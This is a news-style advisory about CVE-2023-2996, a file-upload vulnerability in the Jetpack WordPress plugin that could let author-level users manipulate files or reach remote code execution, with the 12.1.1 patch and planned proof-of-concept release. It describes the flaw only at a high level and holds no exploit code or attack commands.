CVE-2023-2996: A Critical Vulnerability in the Jetpack WordPress Plugin

CVE-2023-2996

Automattic, the custodian of the vastly popular Jetpack WordPress plugin, has recently alerted its user base to a critical security vulnerability — CVE-2023-2996. Jetpack, a one-stop solution to bolster the security, performance, and website management of WordPress sites, enjoys a user base exceeding five million active installations.

The vulnerability was discovered during an internal security audit, and affects Jetpack versions before 12.1.1, with the root cause linked to an unvalidated file upload mechanism. As explained by Jeremy Herve, Automattic Developer Relations Engineer, “This vulnerability could be used by authors on a site to manipulate any files in the WordPress installation.

CVE-2023-2996

The flaw presents a serious risk, providing anyone with ‘author’ level access or above the power to manipulate, delete, and even potentially execute remote code on the WordPress site via a method known as ‘phar deserialization’. This possibility, albeit rare, has the potential to put millions of websites at risk of data loss, corruption, or worse – a complete takeover.

In response to this alarming revelation, Automattic promptly rolled out a security patch, Jetpack 12.1.1. This patch is currently being automatically applied to all WordPress websites using the plugin, a measure designed to shield websites from potential exploitation.

Herve expressed optimism regarding the swift deployment, stating, “We have no evidence that this vulnerability has been exploited in the wild. However, now that the update has been released, it is possible that someone will try to take advantage of this vulnerability.

In light of the serious potential implications, all Jetpack users are strongly urged to update their version of Jetpack to 12.1.1 or later as soon as possible, to ensure the ongoing security of their WordPress sites. As a commitment to their users, Automattic has collaborated with the WordPress.org Security Team to release patched versions of every iteration of Jetpack since 2.0.

In an effort to ensure that users are given ample time to update, Automattic will publicly display the proof of concept (PoC) on July 4, 2023. This strategy provides a buffer for users to update their Jetpack plugin and eliminate the CVE-2023-2996 vulnerability before details of its exploitation become widely known.